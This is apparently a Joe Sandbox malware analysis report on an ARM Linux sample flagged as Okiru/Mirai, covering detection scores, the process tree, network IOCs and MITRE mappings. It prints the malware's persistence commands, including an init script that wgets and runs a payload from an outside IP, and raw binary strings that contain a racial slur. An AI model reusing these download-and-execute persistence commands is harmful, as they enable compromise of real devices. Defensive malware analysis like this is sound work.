Edit tour

Linux Analysis Report
arm5.nn.elf

Overview

General Information

Sample name:	arm5.nn.elf
Analysis ID:	1580247
MD5:	104d6c72a4834200420677e30b9fbe23
SHA1:	9fb08e68aefe810b2bb60e8aef9192e41d96f295
SHA256:	aa3a50f00215074e5cc2adff50ebf43cbd922699018e5af702c88cdc67c8b04e
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580247
Start date and time:	2024-12-24 06:47:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	arm5.nn.elf
Detection:	MAL
Classification:	mal80.spre.troj.evad.linELF@0/10@0/0

Runtime Messages

Command:	/tmp/arm5.nn.elf
PID:	6239
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

arm5.nn.elf (PID: 6239, Parent: 6161, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.nn.elf

arm5.nn.elf New Fork (PID: 6261, Parent: 6239)

sh (PID: 6261, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6267, Parent: 6261)

systemctl (PID: 6267, Parent: 6261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

arm5.nn.elf New Fork (PID: 6292, Parent: 6239)

sh (PID: 6292, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6297, Parent: 6292)

chmod (PID: 6297, Parent: 6292, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

arm5.nn.elf New Fork (PID: 6298, Parent: 6239)

sh (PID: 6298, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6300, Parent: 6298)

ln (PID: 6300, Parent: 6298, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

arm5.nn.elf New Fork (PID: 6301, Parent: 6239)

sh (PID: 6301, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"

arm5.nn.elf New Fork (PID: 6303, Parent: 6239)

sh (PID: 6303, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6305, Parent: 6303)

chmod (PID: 6305, Parent: 6303, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/arm5.nn.elf

arm5.nn.elf New Fork (PID: 6306, Parent: 6239)

sh (PID: 6306, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6308, Parent: 6306)

mkdir (PID: 6308, Parent: 6306, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

arm5.nn.elf New Fork (PID: 6309, Parent: 6239)

sh (PID: 6309, Parent: 6239, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6311, Parent: 6309)

ln (PID: 6311, Parent: 6309, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf

arm5.nn.elf New Fork (PID: 6312, Parent: 6239)

arm5.nn.elf New Fork (PID: 6314, Parent: 6312)

udisksd New Fork (PID: 6249, Parent: 799)

dumpe2fs (PID: 6249, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6280, Parent: 6279)

snapd-env-generator (PID: 6280, Parent: 6279, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6326, Parent: 799)

dumpe2fs (PID: 6326, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6358, Parent: 799)

dumpe2fs (PID: 6358, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
arm5.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6239.1.00007f59e8017000.00007f59e802d000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: arm5.nn.elf PID: 6239	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: arm5.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: arm5.nn.elf

ReversingLabs: Detection: 28%

Source: arm5.nn.elf

String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60008 -> 94.156.227.234:38242

Source: /tmp/arm5.nn.elf (PID: 6239)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: arm5.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, arm5.nn.elf.32.dr, bootcmd.12.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.233/
Source: arm5.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal80.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/arm5.nn.elf (PID: 6239)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/arm5.nn.elf (PID: 6239)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6300)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6311)	File: /etc/rc.d/S99arm5.nn.elf -> /etc/init.d/arm5.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/arm5.nn.elf (PID: 6239)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6297)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6305)	File: /etc/init.d/arm5.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6373/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6395/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6372/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6394/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6375/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6397/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6374/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6396/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6399/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6376/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6398/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6412/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6391/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6390/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6371/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6393/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6370/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6392/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6403/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6402/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6064/cmdline	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6388/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6401/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6389/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6400/status	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6314)	File opened: /proc/6358/status	Jump to behavior

Source: /tmp/arm5.nn.elf (PID: 6261)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6292)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6298)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6301)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6303)	Shell command executed: sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6306)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/arm5.nn.elf (PID: 6309)	Shell command executed: sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6297)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6305)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/arm5.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6308)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 6267)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/arm5.nn.elf (PID: 6239)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6297)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6305)	File: /etc/init.d/arm5.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/arm5.nn.elf (PID: 6239)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/arm5.nn.elf (PID: 6239)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6301)	Writes shell script file to disk with an unusual file extension: /etc/init.d/arm5.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/arm5.nn.elf (PID: 6239)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6301)	File: /etc/init.d/arm5.nn.elf			Jump to dropped file

Source: /tmp/arm5.nn.elf (PID: 6239)

Queries kernel information via 'uname':

Jump to behavior

Source: arm5.nn.elf, 6239.1.000055757e947000.000055757ea95000.rw-.sdmp	Binary or memory string: ~uU!/etc/qemu-binfmt/arm
Source: arm5.nn.elf, 6239.1.000055757e947000.000055757ea95000.rw-.sdmp	Binary or memory string: ~uU!/proc/721/exe1/proc/2079/exe/arm/ro10!/proc/1809/exe0!/usr/bin/vmtoolsd1/usr/lib/systemd/systemd-timedated!/usr/libexec/colord!/proc/759/exe!/proc/2009/exe/arm/pro
Source: arm5.nn.elf, 6239.1.00007ffccc174000.00007ffccc195000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.nn.elf
Source: arm5.nn.elf, 6239.1.00007ffccc174000.00007ffccc195000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.wudUkZ
Source: arm5.nn.elf, 6239.1.000055757e947000.000055757ea95000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: arm5.nn.elf, 6239.1.000055757e947000.000055757ea95000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: arm5.nn.elf, 6239.1.00007ffccc174000.00007ffccc195000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: arm5.nn.elf, 6239.1.00007ffccc174000.00007ffccc195000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm5.nn.elf, 6239.1.00007ffccc174000.00007ffccc195000.rw-.sdmp	Binary or memory string: Wk\|uUN9\|uU/tmp/qemu-open.wudUkZ

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: arm5.nn.elf, type: SAMPLE
Source: Yara match	File source: 6239.1.00007f59e8017000.00007f59e802d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm5.nn.elf PID: 6239, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: arm5.nn.elf, type: SAMPLE
Source: Yara match	File source: 6239.1.00007f59e8017000.00007f59e802d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: arm5.nn.elf PID: 6239, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
arm5.nn.elf	29%	ReversingLabs	Linux.Backdoor.Mirai
arm5.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs
/etc/rc.local	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	arm5.nn.elf	false		high
http://94.156.227.233/	arm5.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, arm5.nn.elf.32.dr, bootcmd.12.dr, custom.service.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.43	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	nklarm6.elf	Get hash	malicious	Unknown	Browse
	nabarm6.elf	Get hash	malicious	Unknown	Browse
	zerarm6.elf	Get hash	malicious	Unknown	Browse
	armv4eb.elf	Get hash	malicious	Unknown	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.42	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	nklarm6.elf	Get hash	malicious	Unknown	Browse
	nabarm6.elf	Get hash	malicious	Unknown	Browse
	zerm68k.elf	Get hash	malicious	Unknown	Browse
	zerarm6.elf	Get hash	malicious	Unknown	Browse
	armv4eb.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	91.189.91.42
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
CANONICAL-ASGB	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
